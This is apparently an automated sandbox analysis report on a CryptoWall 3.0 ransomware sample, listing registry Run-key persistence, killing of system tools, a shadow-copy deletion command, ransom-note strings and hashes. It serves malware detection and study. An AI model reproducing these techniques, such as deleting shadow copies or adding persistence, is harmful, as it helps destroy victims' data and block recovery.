                                                                                                                            • API ID: wcsstr$Process$_memset$CloseCurrentEnumExitFileHandleImageNameOpenProcessesSleepTerminateThread
                                                                                                                            • String ID: cmd.exe$msconfig$procexp$regedit$taskmgr

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875562858.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Similarity
                                                                                                                            • API ID: wcsstr$Process$_memset$CloseEnumExitFileHandleImageNameOpenProcessesSleepTerminateThread
                                                                                                                            • String ID: cmd.exe$msconfig$procexp$regedit$taskmgr

                                                                                                                            APIs
                                                                                                                            • RegCreateKeyExW.KERNEL32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System,00000000,00000000,00000000,00020006,00000000,0041D95E,00000000), ref: 0041E183
                                                                                                                            • RegSetValueExW.KERNEL32 ref: 0041E19E
                                                                                                                            • RegFlushKey.ADVAPI32(0041D95E), ref: 0041E1AA
                                                                                                                            • RegCloseKey.ADVAPI32(0041D95E), ref: 0041E1B0
                                                                                                                            • RegCreateKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,00000000,00000000,00020006,00000000,?,00000000), ref: 0041E1D3
                                                                                                                            • RegSetValueExW.KERNEL32 ref: 0041E206
                                                                                                                            • RegFlushKey.ADVAPI32(?), ref: 0041E20C
                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 0041E212
                                                                                                                            • RegCreateKeyExW.KERNEL32(80000002,Software\Microsoft\Windows\CurrentVersion\Run,00000000,00000000,00000000,00020006,00000000,?,00000000), ref: 0041E235
                                                                                                                            • RegSetValueExW.KERNEL32 ref: 0041E266
                                                                                                                            • RegFlushKey.ADVAPI32(?), ref: 0041E26C
                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 0041E272
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875562858.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseCreateFlushValue
                                                                                                                            • String ID: kL$ kL$E722D94C1CAC34B$EnableLinkedConnections$SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System$Software\Microsoft\Windows\CurrentVersion\Run

                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 004134DA
                                                                                                                            • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 00413555
                                                                                                                            Strings
                                                                                                                            • <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family, xrefs: 0041361F, 00413639, 0041363A
                                                                                                                            • \restore_files_, xrefs: 004134F1, 004135B8
                                                                                                                            • ______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________What happened to your files ?All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.More information about the encryption keys using RSA-2048 can be found h, xrefs: 00413562, 00413589, 0041358A
                                                                                                                            • .html, xrefs: 004135E4
                                                                                                                            • gpmus, xrefs: 00413507, 004135CE
                                                                                                                            • .txt, xrefs: 0041351D
                                                                                                                            • +M, xrefs: 00413483
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875562858.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateFile_memset
                                                                                                                            • String ID: +M$.html$.txt$<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family$\restore_files_$______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________What happened to your files ?All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.More information about the encryption keys using RSA-2048 can be found h$gpmus
                                                                                                                            APIs
                                                                                                                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004279DB
                                                                                                                              • Part of subcall function 00424509: __getptd.LIBCMT ref: 0042451C
                                                                                                                              • Part of subcall function 0042570D: __getptd_noexit.LIBCMT ref: 0042570D
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875562858.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Similarity
                                                                                                                            • API ID: Locale$UpdateUpdate::___getptd__getptd_noexit
                                                                                                                            • String ID: $'$@$g

                                                                                                                            • Source File: 00000002.00000002.875562858.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Similarity
                                                                                                                            • API ID: ExecuteShell_memset_strcat_s$CloseErrorExitHandleLastSleepThread
                                                                                                                            • String ID: <$@$delete $shadows /all /Quiet $xfC

                                                                                                                            APIs
                                                                                                                            • SetLastError.KERNEL32(00000057,75DC55D0,?,0041D8BB,?), ref: 0041DDED
                                                                                                                            • GetCurrentProcess.KERNEL32(00000008,0041D8BB,00000000,75DC55D0,?,0041D8BB,?), ref: 0041DE01
                                                                                                                            • OpenProcessToken.ADVAPI32(00000000,?,0041D8BB,?), ref: 0041DE08
                                                                                                                            • GetLastError.KERNEL32(?,0041D8BB,?), ref: 0041DE12
                                                                                                                            • CloseHandle.KERNEL32(0041D8BB), ref: 0041DE9C
                                                                                                                            • LocalFree.KERNEL32(00000000,00000000,?,0041D8BB,?), ref: 0041DEAA
                                                                                                                            • SetLastError.KERNEL32(?,?,0041D8BB,?), ref: 0041DEBD
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875562858.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLast$Process$CloseCurrentFreeHandleLocalOpenToken
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1977215774-0
                                                                                                                            • Opcode ID: c3f24fab59104aeebdad769a3f0e064d37fd30a399ed324870e09b765df70f4b
                                                                                                                            • Instruction ID: 1eea03d9ae6eddd41489c6ef4305d71b5ef469a94ef1391061eac8053bd55b54
                                                                                                                            • Opcode Fuzzy Hash: c3f24fab59104aeebdad769a3f0e064d37fd30a399ed324870e09b765df70f4b
                                                                                                                            • Instruction Fuzzy Hash: 7431A2B5D00208EFCB14DFA8DC48AEFBBB8EF58311F108566E905D7210D7349A819BA4

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • RegCreateKeyExW.KERNEL32(80000003,\S-1-5-18\Software\msys\,00000000,00000000,00000000,00020019,00000000,?,00000000), ref: 00401A59
                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00401AE2
                                                                                                                            • RegQueryValueExW.ADVAPI32(00000000,0043343C,00000000,?,0043CA20,00000008), ref: 00401A81
                                                                                                                              • Part of subcall function 00402DE0: __strftime_l.LIBCMT ref: 00402DF2
                                                                                                                            • RegCreateKeyExW.KERNEL32(80000001,Software\msys\,00000000,00000000,00000000,0002001F,00000000,00000000,00000000), ref: 00401B10
                                                                                                                            • RegQueryValueExW.KERNEL32(00000000,0043343C,00000000,?,0043CA20,00000008), ref: 00401B2A
                                                                                                                            • RegSetValueExW.KERNEL32 ref: 00401B6A
                                                                                                                            • RegFlushKey.ADVAPI32(00000000), ref: 00401B74
                                                                                                                            • RegCloseKey.KERNEL32(00000000), ref: 00401BD5
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875562858.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.875541434.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.0000000000439000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004BC000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875649125.00000000004D8000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Value$CloseCreateQuery$Flush__strftime_l
                                                                                                                            • String ID: %X%X%X%X%X%X%X%X$E722D94C1CAC34B$Software\msys\$\S-1-5-18\Software\msys\
                                                                                                                            • API String ID: 1839477016-873827912
                                                                                                                            • Opcode ID: c27c1d22e556df01829b08983ba4e0426eb24db553ffa7f2585890b6bb95cac8
                                                                                                                            • Instruction ID: 9685e600e0c5b42de14bfeeca4ed7f4a10fcdf9f0481810e012af34b19a7429f
                                                                                                                            • Opcode Fuzzy Hash: c27c1d22e556df01829b08983ba4e0426eb24db553ffa7f2585890b6bb95cac8
                                                                                                                            • Instruction Fuzzy Hash: 84410B717642A87AD710E7A5AC81F7A7BFC974DB01F10906AF640B61D1D2F8AB009B7C

                                                                                                                            Control-flow Graph

                                                                                                                            control_flow_graph 922 41b6a9 923 41b6b0-41b6d0 call 41b260 Heap32Next 922->923 926 41b6d2-41b6d5 923->926 927 41b6d7 923->927 926->923 926->927 928 41b6dd-41b6ed Heap32ListNext 927->928 929 41b6f9-41b709 928->929 930 41b6ef-41b6f3 GetTickCount 928->930 932 41b713-41b726 Process32First 929->932 933 41b70b-41b70d GetTickCount 929->933 930->929 931 41b668-41b6a0 call 41b260 Heap32First 930->931 931->928 942 41b6a2-41b6a7 931->942 934 41b728-41b756 call 41b260 932->934 935 41b75e-41b76e 932->935 933->932 934->935 949 41b758-41b75c GetTickCount 934->949 939 41b770-41b772 GetTickCount 935->939 940 41b778-41b78b 935->940 939->940 945 41b7c3-41b7d3 940->945 946 41b78d-41b7bb call 41b260 940->946 942->923 947 41b7d5-41b7d7 GetTickCount 945->947 948 41b7dd-41b7f0 945->948 946->945 958 41b7bd-41b7c1 GetTickCount 946->958 947->948 954 41b7f2 948->954 955 41b836-41b83c 948->955 949->934 949->935 959 41b800-41b82e call 41b260 954->959 956 41b847-41b84c CloseHandle 955->956 957 41b83e-41b845 955->957 960 41b852-41b873 FreeLibrary call 41b900 GlobalMemoryStatus 956->960 957->960 958->945 958->946 959->955 970 41b830-41b834 GetTickCount 959->970 968 41b875-41b87a 960->968 969 41b87f-41b884 960->969 968->969 971 41b8a5-41b8b6 GetCurrentProcessId 969->971 972 41b886-41b8a2 969->972 970->955 970->959 973 41b8c2-41b8c7 971->973 974 41b8b8-41b8bd 971->974 972->971 975 41b8e5-41b8fe call 423ebb 973->975 976 41b8c9-41b8e2 973->976 974->973 976->975
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875562858.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.875541434.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.0000000000439000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004BC000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875649125.00000000004D8000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CountTick$Heap32Next$FirstFreeLibraryListProcess32
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3391139479-0
                                                                                                                            • Opcode ID: d08d3607a5a92fb423bab01760a1a07046f89f88a6f18c66bb50b19f3c9d9e8d
                                                                                                                            • Instruction ID: 38ae835f69b5caf0217579c2b68f6554e75d00015f7552b6d1dbb779c9d70d1f
                                                                                                                            • Opcode Fuzzy Hash: d08d3607a5a92fb423bab01760a1a07046f89f88a6f18c66bb50b19f3c9d9e8d
                                                                                                                            • Instruction Fuzzy Hash: 305150706043458BD720EF65C884BAFB7F8FF84744F00892EE59997250DB74D489CBAA

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 0041DF18
                                                                                                                              • Part of subcall function 00421AA0: GetTickCount.KERNEL32(?,?,?,?,004137A9,gpmus,00000005), ref: 00421AB0
                                                                                                                              • Part of subcall function 00421AA0: _rand.LIBCMT ref: 00421AC0
                                                                                                                              • Part of subcall function 00421AA0: Sleep.KERNEL32(0000000F), ref: 00421AE7
                                                                                                                            • PathFindFileNameW.SHLWAPI(004C6B20), ref: 0041DF31
                                                                                                                              • Part of subcall function 0041F000: __strftime_l.LIBCMT ref: 0041F015
                                                                                                                            • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0041DF6E
                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,00000000,75DC55D0,?,0041D906), ref: 0041DF76
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0041DF7F
                                                                                                                            • CopyFileW.KERNEL32 ref: 0041DFCC
                                                                                                                            • _memset.LIBCMT ref: 0041DFD7
                                                                                                                            • CreateProcessW.KERNEL32 ref: 0041E015
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875562858.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.875541434.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.0000000000439000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004BC000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875649125.00000000004D8000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: File$Create_memset$CloseCopyCountErrorFindHandleLastNamePathProcessSleepTick__strftime_l_rand
                                                                                                                            • String ID: %s\%s$%s\svc%s.exe$D
                                                                                                                            • API String ID: 2352187395-2913687874
                                                                                                                            • Opcode ID: a20d45d61241b59f2c321c9321a4567096e053eabdf7572bf23e80bf7564b412
                                                                                                                            • Instruction ID: a58a0c032f7148f8b8d39ec015e3b63cf3cbfd45348febe8a0205d2eea09b8c4
                                                                                                                            • Opcode Fuzzy Hash: a20d45d61241b59f2c321c9321a4567096e053eabdf7572bf23e80bf7564b412
                                                                                                                            • Instruction Fuzzy Hash: 0D31A9717543406BE320DB64DC46FAB73A8EB88710F50491EF648DB1D1EBB5A504C7AA
                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 0040192C
                                                                                                                            • _memset.LIBCMT ref: 00401970
                                                                                                                            • RegCreateKeyExW.KERNEL32(80000001,?,00000000,00000000,00000000,00020019,00000000,?,00000000), ref: 004019CA
                                                                                                                            • RegQueryValueExW.KERNEL32(?,data,00000000,?,1FQ2d43QjTT8zSrWe41EdxtvcVUMWyryJB,00000108), ref: 004019F1
                                                                                                                            • RegCloseKey.KERNEL32(?), ref: 00401A00
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875562858.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.875541434.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.0000000000439000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004BC000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875649125.00000000004D8000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _memset$CloseCreateQueryValue
                                                                                                                            • String ID: 1FQ2d43QjTT8zSrWe41EdxtvcVUMWyryJB$E722D94C1CAC34B$S-1-5-18\Software\%s$Software\%s$data
                                                                                                                            • API String ID: 37298109-134954523
                                                                                                                            • Opcode ID: 4d9f7e680543d8d99612271e93866219557d09a56873c7beb9fb3b5f938b10b2
                                                                                                                            • Instruction ID: 4086e6915d2916525553412eae5256325c76b2fa15a3c6f4e048d67b62872145
                                                                                                                            • Opcode Fuzzy Hash: 4d9f7e680543d8d99612271e93866219557d09a56873c7beb9fb3b5f938b10b2
                                                                                                                            • Instruction Fuzzy Hash: C2219A75E503187BE724DB509C46FEA7374DB18B00F104199BB44771C1EAF46EC48B99
                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 00401869
                                                                                                                              • Part of subcall function 00402DC0: __strftime_l.LIBCMT ref: 00402DD5
                                                                                                                            • RegCreateKeyExW.KERNEL32(80000001,?,00000000,00000000,00000000,00020006,00000000,?,00000000), ref: 004018AE
                                                                                                                            • RegSetValueExW.KERNEL32 ref: 004018CE
                                                                                                                            • RegFlushKey.ADVAPI32(?), ref: 004018DB
                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 004018E8
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875562858.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.875541434.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.0000000000439000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004BC000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875649125.00000000004D8000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseCreateFlushValue__strftime_l_memset
                                                                                                                            • String ID: 1FQ2d43QjTT8zSrWe41EdxtvcVUMWyryJB$E722D94C1CAC34B$Software\%s$data
                                                                                                                            • API String ID: 664986230-1407575524
                                                                                                                            • Opcode ID: ac7df4acec9e5397a45f0ef04bef7e813b3d42dfe4ca5ab36e793aa8752a91ba
                                                                                                                            • Instruction ID: d62cbd1ca9b6743c82e337ef7ba3e84bf7ad82d39c7eccfb29dc7f2b897fbdcf
                                                                                                                            • Opcode Fuzzy Hash: ac7df4acec9e5397a45f0ef04bef7e813b3d42dfe4ca5ab36e793aa8752a91ba
                                                                                                                            • Instruction Fuzzy Hash: DE11E575B90318BBD724DB60DC46FD97378AB18B01F104099BA85B61D0DEF46AC48B58
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00421AA0: GetTickCount.KERNEL32(?,?,?,?,004137A9,gpmus,00000005), ref: 00421AB0
                                                                                                                              • Part of subcall function 00421AA0: _rand.LIBCMT ref: 00421AC0
                                                                                                                              • Part of subcall function 00421AA0: Sleep.KERNEL32(0000000F), ref: 00421AE7
                                                                                                                            • ExitThread.KERNEL32 ref: 004139A8
                                                                                                                              • Part of subcall function 0040EB90: _aullshr.NTDLL ref: 0040EC0D
                                                                                                                            • GetLogicalDriveStringsW.KERNEL32(00000100,?), ref: 004137D7
                                                                                                                            • _memset.LIBCMT ref: 004137F6
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875562858.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.875541434.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.0000000000439000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004BC000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875649125.00000000004D8000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CountDriveExitLogicalSleepStringsThreadTick_aullshr_memset_rand
                                                                                                                            • String ID: A:\$B:\$gpmus
                                                                                                                            • API String ID: 221334729-2720293584
                                                                                                                            • Opcode ID: 4a74c95ecf76a29523d0646e12d963312ebac3b5181e056660efc3377ef08282
                                                                                                                            • Instruction ID: 68f498cd6aaf7dc1cd63195ba9e4301ef2104bc8583fa51ee68a2c2ad5c38cb0
                                                                                                                            • Opcode Fuzzy Hash: 4a74c95ecf76a29523d0646e12d963312ebac3b5181e056660efc3377ef08282
                                                                                                                            • Instruction Fuzzy Hash: AE5103B25102019BD720EF28DC81AE773E4FB98701F844A2BF055E7264E3B49AC4C79A
                                                                                                                            Strings
                                                                                                                            • lIC, xrefs: 00401E5A
                                                                                                                            • 30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC, xrefs: 00401F27, 00401F3B, 00401F3C
                                                                                                                            • 172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264, xrefs: 00401F17
                                                                                                                            • 30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC, xrefs: 00401F46
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875562858.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.875541434.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.0000000000439000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004BC000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875649125.00000000004D8000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: 172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264$30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC$30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC$lIC
                                                                                                                            • API String ID: 0-1019445454
                                                                                                                            • Opcode ID: 5a9cb899e8df9a3df085e5f279fa370133094aa172304d2f827e5193b57b2ac2
                                                                                                                            • Instruction ID: 30f9dac797f5ed8995255b9b1ef71897d5da9c610d1a86821df74dede1b52de5
                                                                                                                            • Opcode Fuzzy Hash: 5a9cb899e8df9a3df085e5f279fa370133094aa172304d2f827e5193b57b2ac2
                                                                                                                            • Instruction Fuzzy Hash: D771F0726002019BC720EB65DCC1E6B77A4AF88318F04497EF945B73A1C77DAD4587EA
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            • lIC, xrefs: 00401E5A
                                                                                                                            • 30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC, xrefs: 00401F27, 00401F3B, 00401F3C
                                                                                                                            • 172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264, xrefs: 00401F17
                                                                                                                            • 30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC, xrefs: 00401F46
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875562858.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.875541434.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.0000000000439000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004BC000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875649125.00000000004D8000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _free
                                                                                                                            • String ID: 172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264$30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC$30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC$lIC
                                                                                                                            • API String ID: 269201875-1019445454
                                                                                                                            • Opcode ID: 04270b1e4ae75e3513a58e087a78b16936eb645fb4be62ff50a40396683c2232
                                                                                                                            • Instruction ID: ab4dd70a3e5f9ffcd353ed3fbdbd548839b92ebe7994dca93fb587f8005bb5b5
                                                                                                                            • Opcode Fuzzy Hash: 04270b1e4ae75e3513a58e087a78b16936eb645fb4be62ff50a40396683c2232
                                                                                                                            • Instruction Fuzzy Hash: B44111716001129BC710EB65EC8196F73E4AB89318F18487AFC45B73A2C77DAD4987DA
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            • lIC, xrefs: 00401E5A
                                                                                                                            • 30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC, xrefs: 00401F27, 00401F3B, 00401F3C
                                                                                                                            • 172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264, xrefs: 00401F17
                                                                                                                            • 30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC, xrefs: 00401F46
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875562858.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.875541434.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.0000000000439000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004BC000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875649125.00000000004D8000.00000002.00000001.01000000.00000005.sdmp
